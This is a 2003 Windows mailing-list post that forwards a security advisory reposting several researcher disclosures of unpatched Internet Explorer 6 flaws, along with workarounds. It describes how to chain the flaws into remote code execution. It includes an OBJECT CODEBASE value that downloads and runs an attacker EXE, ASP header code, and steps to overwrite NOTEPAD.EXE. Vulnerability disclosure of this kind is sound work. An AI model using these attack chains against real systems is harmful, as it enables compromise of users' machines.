[windows2000] FYI: Multiple vulnerabilities in Internet Explorer

  • From: Daniel Ensor <densor@xxxxxxxxx>
  • To: "'windows2000@xxxxxxxxxxxxx'" <windows2000@xxxxxxxxxxxxx>
  • Date: Wed, 26 Nov 2003 13:35:18 -0000

Hi List

Just got this in:

Cheers

Dan
--------------------------------------------------------------------
Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise
--------------------------------------------------------------------

Affected platforms:     IE 6.0 with XP SP1 and MS03-048.
Scope for attack:       Remote via hostile web page / e-mail.
Effect:                 Various up to and including remote
                        code execution leading to compromise of
                        the users machine.
Resolution:             Disable "Active Scripting" in the
                        INTERNET zone.

A whole slew of vulnerabilities in Internet Explorer have been released by
prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest
patches applied. In other words they are no patches available for any of
these problems. This presents a "vulnerability window" in which many
desktops will remain vulnerable unless remedial action is taken immediately.


Pete Philips
pete@xxxxxxxxxxxxxxxxxxx

-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

New "Clean" IE Remote Compromise

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
By combining several vulnerabilities in Internet Explorer, an attacker can
execute his EXE file on victim's system. ("Clean" means: there is no old
published vulnerability involved in this exploit)

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.htm
l
(runs harmless demonstration executable)

[technical details]
First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME, (Liu
Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile)
Then, use BackToFramedJpu to reach MYCOMPUTER zone.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu)
At last, in MYCOMPUTER security zone, use MhtRedirLaunchInetExe to download
the payload EXE file and execute it. (Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe)

[Workaround]
Disable Active Scripting in INTERNET zone.

[Greetings]
greetings to:
Drew Copley, dror, guninski and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[message]
A wise man learns from other's mistakes; a fool learns from his own.

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

MHTML Redirection Leads to Downloading EXE and Executing

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
A vulnerability in Internet Explorer is found: any attacker that can reach
MYCOMPUTER security zone(a.k.a local zone) is able to download his EXE file
and execute it.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunch
InetExe-Demo.zip

[technical details]
There is a feature in Internet Explorer when it tries to retrieve a file
embedded in an MHT file, like:
mhtml:[Mhtml_File_Url]![Original_Resource_Url]
If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE
will try to download [Original_Resource_Url] and return the downloaded
content.

It's like as HTTP redirection.

And CODEBASE execution is a URL-based security check.
(Liu Die Yu's http://continue.to/trie )

So, in MYCOMPUTER security, point CODEBASE property of an OBJECT tag with
unused CLSID to: mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]
and then, IE will download [Attaker_PayloadEXE_Url] and execute it.

[Workaround]
Disable Active Scripting in INTERNET zone.

[Greetings]
greetings to:
Drew Copley, dror, guninski and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[message]
A wise man learns from other's mistakes; a fool learns from his own.

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

BackToFramedJpu - a successor of BackToJpu attack

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
A cross-zone scripting vulnerability has been found in Internet Explorer. If
a webpage contains some subframe(either FRAME tag or IFRAME tag), its
security zone may be compromised.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPa
ge.htm

[technical details]
After applying MS03-048 patch, no javascript-protocol URL won't be stored in
URL history list any more, which means classical "javascript-protocol URL in
history" attack doesn't work any more. (Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html)

However, if an attacker do the following things:
Navigate a sub-frame in victim document to a javascript-protocol URL,
(first, navigate sub-frame to attacker's page, and then navigate the
sub-frame a javascript-protocol
URL)
and then navigate the top window away,
At last,navigate back("history.back()").

the javascript-protocol URL will be loaded by the top window(victim
document) and script in the javascript-protocol URL will be executed in the
security zone of victim document - a.k.a cross-site/zone/domain scripting

[Workaround]
Disable Active Scripting in INTERNET zone.

[Greetings]
greetings to:
Drew Copley, dror, guninski and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[message]
A wise man learns from other's mistakes; a fool learns from his own.

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

HijackClickV2 - a successor of HijackClick attack

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
After applying MS03-048, the original HijackClick exploit doesn't work any
more. With method caching(a.k.a "SaveRef"), HijackClick works again.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage.h
tm

[technical details]
After applying MS03-048, the original HijackClick exploit doesn't work any
more. (Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM

Because window.moveBy is inaccessible. Method caching attack can make
window.moveBy accessible again.

[Workaround]
Disable Active Scripting in INTERNET zone.

[Greetings]
greetings to:
Drew Copley, dror, guninski and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[message]
A wise man learns from other's mistakes; a fool learns from his own.

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

Invalid ContentType may disclose cache directory

[tested]
OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
The problem lies in the download function of Internet Explorer. This can be
exploited by malicious web pages to get cache directory including random
names.

[demo]
There are two harmless demos:
1st, online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo
2nd, demo in ZIP format, powered by NETCAT:
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.zip

[technical details]
When CONTENTTYPE in HTTP response is invalid and file extension is "HTM",
the downloaded HTM file will be opened in cache directory, in INTERNET
security zone.

In the 1st demo, this is done by the following ASP code:
----------
response.ContentType = "whocares"
response.AddHeader "content-disposition", "inline; filename=test.htm"
----------

In the 2nd demo, this is done with the help of NETCAT.

[Workaround]
Disable Active Scripting in INTERNET zone, so HTML page opened in the cache
can't send information back to the attacker.

Note for "Invalid ContentType may disclose cache directory"

This vulnerability("Invalid ContentType may disclose cache directory")
doesn't work on all systems. ("Invalid ContentType may disclose cache
directory", at
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/)
Please note that execdror6 and LocalZoneInCache also depends on this
vulnerability.
(execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/
LocalZoneInCache: http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/)
I have spent extra-ordinary time on this issue and here is all i know about
it:

First, The code was verified to work on a WinXp system(Simplified Chinese
version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV, Dror
Shalev and the Pull for testing: It works on Dror Shalev's WinXp
machine(up-to-date) but it doesn't work on the Pull's Win2k system. (because
he set killbit for Adodb.Stream activeX object.) Soon after that,
HTTP-EQUIV found it does not work on his WinXp system(2-3 weeks old, with
the latest IE patch). Then, to figure out what happened, i formatted disk
and installed Win2k3 and WinXp(both Simplified Chinese version) and then
applied the latest IE patch. Both remote compromise cases(LocalZoneInCache
and execdror6) don't work any more. At last,  i reproduced both remote
compromise cases on MSIEv6 running on Simplified Chinese WinXp with the
following patches: SP1;Q828750;Q330994;Q824145(a.k.a MS03-048)

If you are using IE, please help me test it and send the result directly to
my emailbox. Thanx in advance.

[Greetings]
greetings to:
Drew Copley, dror, guninski and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise

[tested]
OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
By combining cache file disclosure and several other unpatched
vulnerabilties, an malicious INTERNET page can reach MYCOMPUTER zone. The
demo uses Adodb.Stream to launch a remote compromise attack.

[demo]
There are two harmless demos:
Online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-De
mo/index.html
(runs harmless demonstration executable)

[technical details]
First, place an HTML file in IE cache directory and get its location. (Liu
Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html)
Second, this HTML file can be parsed as an HTML page and treated as in
MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's
http://www.mlsecurity.com/ie/ie.htm)
(Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Co
ntent.htm)
At last, Overwrite NOTEPAD.EXE and make IE launch it by openning a
view-source protocol URL: (HTTP-EQUIV of MALWARE 's
http://www.securityfocus.com/archive/1/343521)

[Workaround]
Disable Active Scripting in INTERNET zone, so HTML page opened in the cache
can't send information back to the attacker.

[Greetings]
greetings to:
Drew Copley, dror, guninski, vadim and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

IE Remote Compromise by Getting Cache Location

[tested]
OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
With the help of LocalZoneInCache(refer to "[technical details]" part), an
attacker can compromise a user's system even though the user has: 1.
Customized IE cache directory, 2. Applied MS03-048 patch, 3. Set killbit for
ADODB.STREAM ActiveX.

[demo]
online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.html
(runs harmless demonstration executable)

[technical details]
execdror6 is derived from execdror5.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/)
execdror6 differs from execdror5 in that:
1st, execdror6 uses LocalZoneInCache to reach MYCOMPUTER security zone. (Liu
Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html)
2nd, execdror6 gets IE cache directory directly from location.href.
(LocalZoneInCache makes attaker's HTML page opened in cache directory.)

[Workaround]
Disable Active Scripting in INTERNET zone, so HTML page opened in the cache
can't send information back to the attacker.

[Greetings]
greetings to:
Drew Copley, dror, guninski, vadim and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
about donating at: http://clik.to/donatepc



------------------------------------------------------------------------
The information you receive/contained herein is to keep you aware of
developments in IT security that have general relevance to your IT systems
environment. Our objective is to provide information to you as rapidly as
possible to alert you to security threats, issues and potential solutions.
In view of the expediency of the information the solutions described will
not necessarily have been fully tested as to their applicability to your
particular environment. Hence you use this information at your sole risk and
liability. All trademarks are acknowledged as belonging to their respective
owners.

Visit the new FDL web - site designed to serve you better -
http://www.fdl.co.uk 


This message has been sent from Fuerst Day Lawson Ltd and confirms that the
email has been scanned and to the best of our knowledge is free from virus
infection. The unauthorised use, disclosure, forwarding or copying of this
message and any attachments is strictly prohibited. If you have received
this message in error, please email moderator@xxxxxxxxx This message and any
attachments, which are confidential and may be privileged, are for the use
of the addressee(s) only. The views and opinions expressed in this email
message are the author's own and may not reflect the views and opinions of
Fuerst Day Lawson Ltd. 
********************************************************
This Weeks Sponsor SeamlessPlanet.com
Register your domain name for as low as $7.75 per year!
Cheaper than Godaddy..same great service! 
http://SeamlessPlanet.com
********************************************************
To Unsubscribe, set digest or vacation
mode or view archives use the below link.

http://thethin.net/win2000list.cfm

Other related posts: